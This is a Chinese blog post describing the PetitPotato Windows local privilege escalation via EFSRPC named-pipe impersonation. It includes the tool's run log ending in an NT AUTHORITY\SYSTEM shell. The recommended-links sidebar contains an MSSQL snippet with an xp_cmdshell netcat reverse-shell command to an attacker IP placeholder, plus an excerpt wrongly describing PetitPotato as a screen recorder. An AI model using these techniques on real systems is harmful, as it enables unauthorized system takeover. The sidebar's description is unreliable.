Windows提权之PetitPotato

最新推荐文章于 2025-06-30 20:06:33 发布
原创 最新推荐文章于 2025-06-30 20:06:33 发布 · 680 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows

影响范围

Windows 21H2 10.0.20348.1547

漏洞类型

本地提权

漏洞概述

2021年12月微软发布了一个针对不同EFSRPC漏洞的补丁CVE-2021-43217,Microsoft对EFSRPC通信实施了一些强化措施,特别是在使用EFSRPC时,EFSRPC客户端需要使用RPC_C_AUTHN_LEVEL_PKT_PRIVACY,如果客户端未能做到这一点则客户端将被拒绝,并生成一个Windows应用程序事件,这里的MS-EFSR是一种用于对远程存储并通过网络访问的加密数据执行维护和管理操作的协议,该协议有一系列类似EfsRpcOpenFileRaw的API,例如:


long EfsRpcOpenFileRaw(
   [in] handle_t binding_h,
   [out] PEXIMPORT_CONTEXT_HANDLE* hContext,
   [in, string] wchar_t* FileName,
   [in] long Flags
);

这种API可以通过FileName参数指定UNC路径以打开服务器上的加密对象进行备份或恢复,当指定格式为\\IP\C$的路径时,lsass.exe服务将使用NT AUTHORITY系统帐户权限访问\\IP\pipe\srvsvc,如果我们可以调用EfsRpcOpenFileRaw API来强制本地计算机连接到我们创建的恶意命名管道,那么我们就可以模拟命名管道客户端进程并最终获得SYSTEKM权限,但由于相关补丁的限制,使得旧的PetitPotam无法在新版本的Windows上运行,但是在调用EFS之前可以通过RpcBindingSetAuthInfoW将AuthnLevel设置为RPC_C_AUTHN_LEVEL_PKT_PRIVACY在最新的系统上有效

漏洞复现

项目地址:https://github.com/wh0amitz/PetitPotato

C:\Users\Administrator\Desktop>PetitPotato.exe 3 cmd

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
Microsoft Windows [Version 10.0.20348.1547]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

参考链接

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

https://itm4n.github.io/from-rpcview-to-petitpotam/#exploring-the-efsrpc-interface-with-rpcview

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31

源自:微信公众号"七芒星实验室"

https://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247488517&idx=3&sn=de55c66107f57a72bb43cc592c5c46f4&chksm=cf62ef0df815661b3136959443d237ecc1b764e041205dc1af91773d8b94fbd046578a482388&token=334570152&lang=zh_CN#rd

升】Windows Server 2022 21H2 本地升漏洞(PetitPotam)
李同學的安全圈
03-23 1623
Windows Server 2022 Standard/Datacenter 21H2 存在本地升漏洞,攻击者可通过在受害主机上执行特定可执行程序并对普通用户升至 nt authority system ,进而执行其他操作。
利用PetitPotam进行NTLM Relay攻击
谢公子的博客
09-18 6488
2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC,MicroSoftEncrypting File System Remote Protocol)。MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTL.
【亲测免费】 探秘PetitPotamWindows本地新工具
gitblog_00055的博客
06-13 707
探秘PetitPotamWindows本地新工具 在网络安全领域,有一款名为PetitPotam的开源项目,它为安全研究人员和IT专业人员供了一种全新的本地方法。灵感来源于Potitpotam,PetitPotam巧妙地利用了Microsoft Enhanced File System Rights Management Services(MS-EFSR)协议中的接口,为系统升开...
Java utgard连接OPC问题记录
wangxin1949的博客
08-10 2575
怎么开启是个问题, 是在引入openscada的jar包里的Sever类中修改,这就犯难了, 其实没必要, 只要在自己项目下创建与openscada中Server类相同的路径,并复制Server过去改就行了, 项目会优先使用本地类,像下面这样。奇迹发生了,0x00000005解决. 注: 我的安全补丁编码跟网上查到的并不一样, 所以最初没有删,后来全都删了就好了,这个编码规则咱也不知道.安全日志中记录用户登录行为, OPC通信需要使用Windows系统用户进行登录, 如果用户名密码错误这里会有相关记录.
WMI--Windows API--RPC_C_AUTHN_LEVEL_xxx
Coperator
12-29 2437
原文来自MSDN Library for Visual Studio 2008 SP1,翻译部分仅为个人观点,想要看更多信息请看MSDN,如有版问题请联系QQ 643166601,邮件643166601@qq.com   COM RPC_C_AUTHN_LEVEL_xxx See Also   Used in the security functions and interfac
windows权之BypassUAC&DLL劫持&引号路径&服务
m0_62207170的博客
03-21 1516
windows权之BypassUAC&DLL劫持&引号路径&服务
系统权之Windows
f_carey的博客
11-04 3204
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务限配置错误2.1.1 利用 Po.
内网渗透之——windows权之——利用第三方软件Filezilla
wsnbbz的博客
03-12 1487
介绍 FileZilla是一个免费开源的FTP软件,分为客户端版本和服务器版本,具备所有的FTP软件功能。可控性、有条理的界面和管理多站点的简化方式使得Filezilla客户端版成为一个方便高效的FTP客户端工具,而FileZilla Server则是一个小巧并且可靠的支持FTP&SFTP的FTP服务器软件 Filezilla和普通Web网站一样,前台有普通FTP账户执行上传、下载、删除...
〖教程〗Ladon权之Potato系列-windows全版本(IIS用户/服务用户)
K8哥哥
08-16 3303
Ladon权之PipePotato/BadPotato/SweetPotato/PrintSpoofer 版本 >= Ladon 7.2.0 Update: 20200810 Potato原理 通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。 条件 1 本地NTLM
Windows本地权之dll劫持
ssrf
03-04 2964
目录0x001 原理0x002 演示1、收集进程加载的dll2、msf制作dll木马3、替换dll4、启动软件 0x001 原理 Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索: Windows查找DLL目录及其顺序如下: 1、应用程序加载的目录 2、C:\Windows\System32 3、C:\Windows\System 4、C:\Wind
PetitPotam: 强制Windows主机通过MS-EFSRPC认证的PoC工具
gitblog_00935的博客
09-03 947
PetitPotam: 强制Windows主机通过MS-EFSRPC认证的PoC工具 项目介绍 PetitPotam是一款概念验证(Proof-of-Concept,PoC)工具,专门设计用于迫使Windows主机对其他机器进行身份验证,利用的是MS-EFSRPC中的EfsRpcOpenFileRaw函数或其他类似功能。该工具有能力利用LSARPC命名管道(接口为c681d488-d850-11d...
WIN10共享打印机连接出现0x0000011b错误代码无法共享打印
林中静月下仙的博客
02-17 7139
最后在微软官方文档才发现端倪,微软官方是这么说的:Windows和非Windows打印客户端必须支持RPC_C_AUTHN_LEVEL_PKT_PRIVACY连接到Windows打印服务器,而且Windows更新后系统里边RpcAuthnLevelPrivacyPrivacyAnd的值默认 = 1,如果打印不了,给出的解决方案,就是在有安装共享打印机的这台电脑新增配置一个注册表的参数就可以了,我们打开注册表(用命令regedit,如图示),的问题就这么搞定了。
Windows向之限维持三小技
m0_60571990的博客
12-06 402
Windows向之限维持三小技
PetitPotam 漏洞(CVE-2021-36942)分析
Jay
04-18 1535
PetitPotam 漏洞(CVE-2021-36942)分析 • 漏洞分析 攻击者可以通过构造恶意的文件路径,使得目标服务器尝试与攻击者控制的服务器建立连接。在这种情况下,攻击者可以捕获目标服务器的 NTLM 凭据,甚至可能实施更进一步的攻击,例如传递哈希攻击(Pass-the-Hash)或利用其他漏洞进行横向移动。 漏洞描述 --- PetitPotam 漏洞(CVE-2021-36942)是一个 Windows 远程协议(MS-EFSRPC)中的安全漏洞,它影响了微软的加密文件系统(EFS)。这个漏洞
windows10连接共享打印机显示“0x0000011b”错误的解决方法
热门推荐
爱折腾的博客
09-09 3万+
win10连接共享打印机显示错误0x0000011b怎么办?有些小伙伴在更新了win10系统的补丁后,打开自己的打印机示“操作失败,错误为0x0000011b”,不知道怎么解决,下面小编带来了解决方法,一起看看吧。
【Cyberstrikelab】lab2
最新发布
大方子
06-30 752
这样当我们访问这个日志文件的时候,我们之前的webshell代码就会执行,在目录下生成一个shell.php的一句话木马。使用TomcatScanPro对Tomcat进行扫描,发现存在CVE-2017-12615漏洞。查看下TomcatScanPro的配置文件,可知写入的webshell密码为pass。然后再包含下这个日志文件,这里注意你当时的时间,因为日志文件名称是以日期来命名的。发现只有一个网段,故这个主机渗透就到此为止。访问写入的webshell,发现是可以的。对应的目录就会生成当前时间的日志文件。
PetitPotato:轻量级、高效的屏幕录制工具
gitblog_00089的博客
04-26 488
PetitPotato:轻量级、高效的屏幕录制工具 是一款开源的跨平台屏幕录制软件,由开发者 wh0amitz 创建。它的设计目标是供一个简单易用、性能优异且无广告的解决方案,帮助用户轻松记录他们的屏幕活动。 技术分析 PetitPotato 基于 Rust 语言编写,这使得它具备了良好的内存管理和并发性能。Rust 的安全性特性保证了代码的健壮性,降低了程序崩溃或出现安全漏洞的可能性。此外,P...
非匿名方式访问远程的com+
weixin_30394633的博客
09-18 197
windwos的安全机制规定:windows接收远程的com+调用的时候,会验证这个调用的限。如果限不够就出现经典的“拒绝访问”错误。 解决这个问题已知访问方式有: 1、匿名访问;在应用服务器(简称AP)启用guest,并且设置guest具有激活和访问COM+的限。这条路是可行,不过安全性不能得到保证。 2、客户端电脑的登录用户和密码和AP上的一个用户一致,并且这个用户在AP上也具有相...
mssql权之反弹shell
01-14
### 在 MSSQL 中通过技术实现反弹 Shell #### 利用 `xp_cmdshell` 执行命令并反弹 Shell 对于拥有高限账户(如 sa 用户),可以通过启用 `xp_cmdshell` 来执行操作系统级别的指令,进而建立反向连接。由于 `xp_cmdshell` 默认仅在 SQL Server 2000 版本中处于激活状态,在后续版本里已被禁用;不过这并不妨碍攻击者借助 sp_configure 命令再次打开此功能[^3]。 一旦成功启用了 `xp_cmdshell`,便能够调用 Netcat 或其他类似的工具来创建一个从目标机器指向攻击者的交互式会话: ```sql EXEC master..xp_cmdshell 'nc -e cmd.exe 攻击机IP 端口' ``` 上述语句中的 IP 地址应替换为实际用于接收回连请求的服务器地址,而端口号则是事先设定好的监听端口[^1]。 需要注意的是,现代 Windows 防火墙策略以及应用程序白名单机制可能会阻止此类操作的有效实施。因此,在真实环境中应用这些技巧之前,务必考虑环境的安全配置情况。 另外一种方式是利用 `OPENROWSET` 函数配合 `OPENDATASOURCE` 进行跨数据库查询的同时注入恶意代码,从而间接达到相同的效果。然而这种方法较为复杂且依赖于特定条件下的网络设置与认证模式[^5]。 为了高成功率,建议先尝试获取更高层次的操作系统访问限,比如通过 Web 应用程序漏洞获得初始立足点后再进一步探索内部资源和服务,最终达成远程控制的目的。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值